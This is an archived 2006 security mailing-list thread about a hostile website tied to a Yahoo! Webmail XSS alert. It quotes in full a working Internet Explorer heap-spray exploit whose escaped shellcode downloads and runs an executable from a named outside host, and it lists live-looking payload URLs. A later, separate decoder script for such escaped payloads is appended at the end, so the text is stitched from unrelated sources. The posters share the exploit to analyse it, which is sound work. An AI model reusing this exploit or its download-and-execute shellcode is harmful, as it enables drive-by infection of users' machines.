Dailydave mailing list archives

RE: [Argeniss] Alert - Yahoo! Webmail XSS
From: "C programming List" <cprog.list () gmail com>
Date: Tue, 18 Apr 2006 17:54:23 -0400

The top page a level above that is quite interesting too.  Although I'd only
recommend browsing it with wget and notepad, to be on the safe side.  Should
someone perhaps notify all those banks mentioned?  (Then again, telling them
"Watch out for suspicious CC transactions from eastern European nations"
probably isn't telling them anything they don't already know....)


   cheers,
     DaveK

Looking at the front page on my regular browsers (Firefox, Galeon,
Konqueror), all 3 die. Apparently, from what I see, the browser
makes repetitive calls to mmap2:
mmap2(NULL, 524288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0) = 0x8af82000

I don't know what he wants, but apparently it is just to map as much
memory as possible. Does anyone know what script he uses to generate
this?
There is also http://www.w00tynetwork.com/news.htm which has what I
believe is an IE explorer exploit, maybe another browser, but Windows
oriented.

<head>
<meta http-equiv="refresh" content="2;url=news.htm">
</head>
<input type="checkbox" id="javascript">
<SCRIPT language="javascript">

shellcode = unescape(
    "%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC" +
    "%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0" +
    "%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877" +
    "%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0" +
    "%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456" +
    "%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D" +
    "%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A" +
    "%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC" +
    "%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124" +
    "%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000" +
    "%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u6F61%u2E6C%u7865" +
    
"%u0065%u7468%u7074%u2F3A%u772F%u7777%u772E%u3030%u7974%u656E%u7774%u726F%u2E6B%u6F63%u2F6D%u6962%u616E%u7972%u2E32%u7865%u0065%u0000");

bigblock = unescape("%u9090%u9090");
slackspace = 20 + shellcode.length

while (bigblock.length < slackspace)
    bigblock += bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length + slackspace < 0x40000)
    block = block + block + fillblock;

memory = new Array();

for ( i = 0; i < 2020; i++ )
    memory[i] = block + shellcode;

var r = document.getElementById('javascript').createTextRange();

</script>

This shellcode downloads and execs this binary:
http://www.w00tynetwork.com/binary2.exe. Does anyone know what the
binary does?
I've tried to get the file that the XSS is going to download but the
address never replies.
http://211.22.14.50/.yahoomail/x.htm
A whois on the address gives a company named Ceraco International Co., Ltd.,
which I guess is a drone.
Does anyone have any more on this web?
-daniel
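
One static way to see what a `%u`-escaped block like the one quoted in the post carries, without rendering the page, added here as an example (it is not part of the original post). The sample input is constructed and uses a reserved `.invalid` name; the function names are hypothetical.

```javascript
// Added example: static triage of %uXXXX-escaped script data (never executed).
// SAMPLE is constructed for this example; it is NOT the payload from the post.
// It holds padding bytes followed by a NUL-terminated URL on a reserved domain.
const SAMPLE =
  'x = unescape("%u9090%u9090%uCCCC%u7468%u7074%u2F3A%u652F" +\n' +
  '    "%u6178%u706D%u656C%u692E%u766E%u6C61%u6469%u782F%u622E%u6E69%u0000");';

// Collect every %uXXXX token in source order and expand each 16-bit unit into
// two bytes, low byte first (the in-memory order on little-endian x86).
// Tokens from separate string literals are simply concatenated, which is
// good enough for string extraction.
function decodePercentU(source) {
  const bytes = [];
  for (const m of source.matchAll(/%u([0-9a-fA-F]{4})/g)) {
    const unit = parseInt(m[1], 16);
    bytes.push(unit & 0xff, unit >> 8);
  }
  return bytes;
}

// Runs of printable ASCII at least minLen long, like strings(1).
function printableRuns(bytes, minLen = 6) {
  const runs = [];
  let cur = "";
  for (const b of [...bytes, 0]) { // trailing 0 flushes the final run
    if (b >= 0x20 && b <= 0x7e) {
      cur += String.fromCharCode(b);
      continue;
    }
    if (cur.length >= minLen) runs.push(cur);
    cur = "";
  }
  return runs;
}

// URLs embedded in the decoded bytes.
function extractUrls(source) {
  return printableRuns(decodePercentU(source))
    .map((s) => s.match(/(?:https?|ftp):\/\/[\x21-\x7e]+/i))
    .filter(Boolean)
    .map((m) => m[0]);
}

// Defang an indicator so it is safe to paste into a ticket or e-mail.
function defang(url) {
  return url.replace(/^http/i, "hxxp").replace(/\./g, "[.]");
}

console.log(extractUrls(SAMPLE).map(defang));
```

Run it with Node against a page saved with wget; the script only reads the text and never evaluates it.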
